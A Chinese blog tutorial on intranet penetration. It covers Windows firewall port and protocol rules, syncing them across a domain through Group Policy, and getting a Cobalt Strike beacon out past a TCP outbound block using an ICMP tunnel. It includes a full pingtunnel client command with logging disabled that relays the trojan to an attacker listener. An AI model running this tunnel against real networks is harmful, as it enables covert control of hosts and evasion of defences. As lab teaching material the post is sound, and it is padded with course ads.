内网渗透-域防火墙+入站出站规则+组策略对象同步+不出网隧道上线

原创 于 2025-01-02 20:06:31 发布 · 1k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #黑客技术 #网络安全 #SQL注入 #内网渗透 #渗透测试 #防火墙

一.单机-防火墙-限制端口出入站-熟悉常见主机配置不出网的方式

配置防火墙属性

1.win10虚拟机本地搭建一个网站,配置防火墙属性的入站连接为默认值。

在这里插入图片描述

局域网中另一台主机能正常访问

在这里插入图片描述

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

2.入站连接设置为 阻止所有连接 。

因为是我们去访问他的网站,所以是入站。
在这里插入图片描述

无法在访问成功

在这里插入图片描述

配置出入站规则

正向连接&反向连接

reverse监听反向:上传的后门会主动连接我们控制的服务器对于目标防火墙中属于出站规则

bind监听正向:我们控制的服务器主动去连接目标服务器对于目标防火墙中属于入站规则

1.cs生成exe木马

上传到win10虚拟机,能正常上线

2.因为使用的是reverse监听器方式,所以是出站,使用的是9527端口。在win10虚拟机配置出站规则

新建规则——直接禁止了9527端口的连接

再次执行cs木马程序,程序无法执行,cs无法上线

二.单机-防火墙-限制协议出入站-熟悉常见主机配置不出网的方式

配置协议

新建规则——将规则应用于tcp协议和所有端口

配置完成后,不管cs或者msf更换任何端口都无法在上线

三.域控-防火墙-组策略对象同步-熟悉常见主机配置不出网的操作流程

1.查看一台域内主机的防火墙状态,域和专用网络是开启状态,公用网络关闭状态

2.登录域控制器,操作:开始-管理工具-组策略管理-域-创建GPO链接

创建名称为 fhq

3.fhq处右键——编辑——来到 高级安全 windows 防火墙——右键 属性

4.我们配置为:域——启用 专用和公用——关闭

5.限制协议:在来到出站规则——右键 新建规则 ——端口——选择 TCP和所有端口——阻止连接——选择 域——名字:TCP协议控制

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

6.如何让域控制器的配置在域成员主机生效?

生效策略:强制&命令&重启

命令:

来到域内主机,命令行执行命令:gpupdate/force

再次查看防火墙状态,发现变成了域控制器上的配置

强制:强制生效

回到组策略管理——fhq右键——强制

来到出站规则,可以看到TCP协议控制同样生效

配置完成后,ping www.baidu.com能ping通,网络没问题。但是浏览器访问不了,就是因为禁用了TCP协议。ping走的是ICMP协议。

四.隧道技术

如果目标主机的出站规则中TCP协议被封杀,入站规则没有封杀,有互联网网络。该怎么上线?

1.正向连接:取得一台有网络能和目标主机通讯的服务器权限

2.隧道技术:走其他协议出网即可

隧道技术

前提:已获取一台域用户主机的管理员权限

1.本机启动cs,新建两个监听器,分别为127.0.0.1:5555和本机ipv4地址:6666

2.生成exe程序木马

3.启动pingtunnel工具

下载:https://github.com/esrrhs/pingtunnel

4.将exe程序木马和pingtunnel.exe工具上传到域用户主机

使用管理员用户启动命令行,执行如下:

pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.172.249 -t 192.168.172.249:6666 -tcp 1 -noprint 1 -nolog 1

5.运行exe木马,cs成功上线

如果目标主机没有互联网网络怎么办?

正向连接:取得一台有网络能和目标主机通讯的服务器权限。将服务器当做跳板,把数据给出网的服务器,通过出网服务器正向连接控制目标主机

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

Windows防火墙出站规则配置
悦分享
10-09 3282
自从 Windows XP SP2 操作系统中内置了 Windows 防火墙之后,其功能也更加完善,而且通过 Windows 10 络位置的配置文件,Windows 防火墙可以灵活地保护不同络环境下的通信安全。使用 Windows 防火墙,再配合 Windows 自带的其他安全功能,足够保护操作系统的安全
出站规则
weixin_30920597的博客
03-16 443
一.络知识 1.阿里云端口号开通后,如果还是没法访问,新建规则 是容许别人访问你的端口 转载于:https://www.cnblogs.com/haigui-zx/p/8583730.html
windows中的出站规则
男神的专栏
03-14 9549
另外,这里配置的是阻止连接,还有允许连接,因为默认的就是允许连接,因为你不能直接就禁止一个客户端程序访问它的服务器,比如易云音乐。对端口设置阻止连接后,本机向外的请求中,如果请求的远程服务器端口是设置的端口,那么请求会被拦截。可以设置所有端口,那么所有请求都会被拦截。规则是用来限制远程主机访问本机的服务的,就是说,本机接收的请求中如果被请求的程序或具体端口是被限制的,该请求被拦截。出则规则使用来限制对外访问的,也就是说从本机发出的请求中,如果请求的对象是被禁止的,该请求会被拦截,表现方式就是断
2、内网安全-防火墙-站出规则-不出隧道上线-组策略对象同步
Karka_的博客
02-20 3015
用途:个人在线笔记,有所借鉴,欢迎指正隧道技术:解决不出协议上线的问题(利用出协议进行封装出)代理技术:解决络通讯不通的问题(利用跳板机建立节点后续操作)
内网渗透Day2----防火墙&站出规则&不出隧道上线&组策略同步(ICMP隧道
最新发布
qq_52227682的博客
11-20 1272
小迪内网渗透
内网渗透信息收集&防火墙策略同步&不出ICMP隧道上线
2301_76227305的博客
05-14 949
是一个有安全边界的计算机集合,在内的计算机互相信任,在内访问其他机器,不需要再被访问机器许可滴。内的主机由控制器(Domain Controller,DC)统一管理,每个至少有一台DC。中的账号资源统一被DC管理,比如管理员登录了DC,那么他就可以对内的账号进行密码修改或者限制它访问某类资源,安装软件啥的。拥有账号的用户叫用户,用户可以在内的任何一机器登录它的账号,比如A机器B机器在同一内,那么用户既可以在机器A登录也可以在机器B登录。以上就是本次的内容啦。
内网渗透-防火墙规则上线-正反向连接+隧道技术-SMB+防火墙控制
xiaoheizi的博客
11-10 524
想要通过windows10正向连接拿下windows2008时,发现windows2008开启了防火墙规则做了限制,无法正向连接。拿下win2008后,我们还想要让win2012也上线cs,但是因为win2008限制了规则,所以无法再使用反向连接上线。前提:已经使用攻击机通过漏洞拿下了windows7主机,又通过windows7正向连接拿下了windows10。开启防火墙:netsh advfirewall set allprofiles state on。2.生成后门,使用此监听器。
第125天:内网安全-隧道技术&SMB&ICMP&正反向连接&防火墙规则上线
qq_46081990的博客
08-02 2345
拓扑图:在前一次的基础上,win2008做了限制(只让访问Web服务),win2012也做了限制(只让访问打印机)思路:win7还是有外出口的,正向tcp/反向tcp都能直接拿下;拿下win7后,生成正向tcp,让win7主动连接拿下win10(也可以反向,但需要在win7的11卡上设置监听器,转发上线win10);
内网安全【2】——防火墙/站出规则/不出隧道上线/组策略对象同步
weixin_42090431的博客
05-08 1019
进行封装出)(络里面有络防护,防火墙设置让你不能正常访问络 但有些又能正常访问,利用不同的协议tcp udp 以及连接的方向:正向、反向)建立节点后续操作) (络设置导致的络不通 一个A学校 一个B学校 压根不在一个络 硬性条件决定络不通)作为中间人两边通信。(相对于这台主机而言,进来的络是出站(相对于这台主机而言,出去的络是出站)以自身的防火墙为参考 以下答案(规则)1、单机-防火墙-限制端口出。单机-防火墙-限制端口出。单机-防火墙-限制协议出
内网安全防火墙&站出规则&不出隧道上线&组策略对象同步
qq_53058639的博客
01-26 1488
解决络不通讯问题代理与隧道技术:代理:流量转发至跳板机,可以是服务器或者肉鸡,最主要的特征是,无论代理后面挂了几个设备,代理对外只表现为一个设备。隧道:是通过特定的通讯方法,直接找到这个目标reverse_tcp:反向 后门主动连接自己服务器 目标防火墙 出bind_tcp:正向 自己服务器主动连接后门 目标防火墙
【初步了解络原理】防火墙站出规则络协议
热门推荐
おうせき碩の博客
12-14 1万+
  [catalog]     1. 防火墙简述   2. 防火墙规则出站规则   3. 新建出站规则   4. 络协议   5. 【每日一面】TCP UDP 的区别     1. 防火墙简述 防火墙 (Firewall)属于用户络边界的安全保护设备,内部外部络之间的所有络数据流都必须经过防火墙防火墙的目的就是在络连接之间建立一个安全控制点,通过允许、拒绝或重新定向经过防火墙的数据流,实现对进、出内部络的服务访问的审计控制。典型的
【jdk与tomcat配置&文件夹共享&防火墙设置(站出规则)】
kissship的博客
12-26 1484
还在为访问固定端口而关闭防火墙而烦恼吗???在职前必须掌握的几大技巧之一的文件夹共享你是否熟悉操作流程???jdk与tomcat的配置
123-防火墙&站出规则&不出隧道上线&组策略对象同步
dreamer292的博客
08-22 1338
就是别人来访问我们的主机,也就是正向shell的操作,点那个主机的后门进行运行时,kali需要主动去连接靶机也就是外来的流量,如果把的链接关闭就无法连接到 出站就是反向shell,主机需要主动连接kali,如果出站设置了阻止就会阻止这种主动连接的操作。
Windows防火墙:“Windows允许应用或功能通过Windows Defender防火墙”与“规则出站规则”优先级(注意:“出站规则”限制对象是“目标端口”而非“源端口”)明确拒绝优先原则
Dontla的博客
02-17 6716
规则控制外部源向您的计算机发送的数据包。它们决定了哪些服务或应用可以接收来自络的连接请求。
windows server 防火墙添加出规则方法
Yuperman的专栏
09-03 7405
windows系统默认的规则:默认阻止连接,默认允许出站连接。也就是说,凡是连接,任何程序端口都要在防火墙上配置规则,否则都会被禁止。【规则】:允许其他机器访问本服务器的端口或地址,增加规则出站规则】:允许本服务器访问其他机器端口或地址,增加出站规则
win10防火墙规则设置
qq_36448110的博客
11-18 3849
规则出站规则设置
勤劳的码农
04-21 6251
https://jingyan.baidu.com/article/fb48e8bee35d456e622e14b3.html
内网安装Oracle必备:compat-libstdc++-33依赖包下载指南
资源摘要信息:"oracle11g内网安装依赖-compat-libstdc++-33-3.2.3-47.3.i386.rpm" 在信息技术领,特别是在数据库管理系统安装过程中,确保所有必要的依赖项被满足是十分关键的。本次文档将详细介绍oracle11g...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值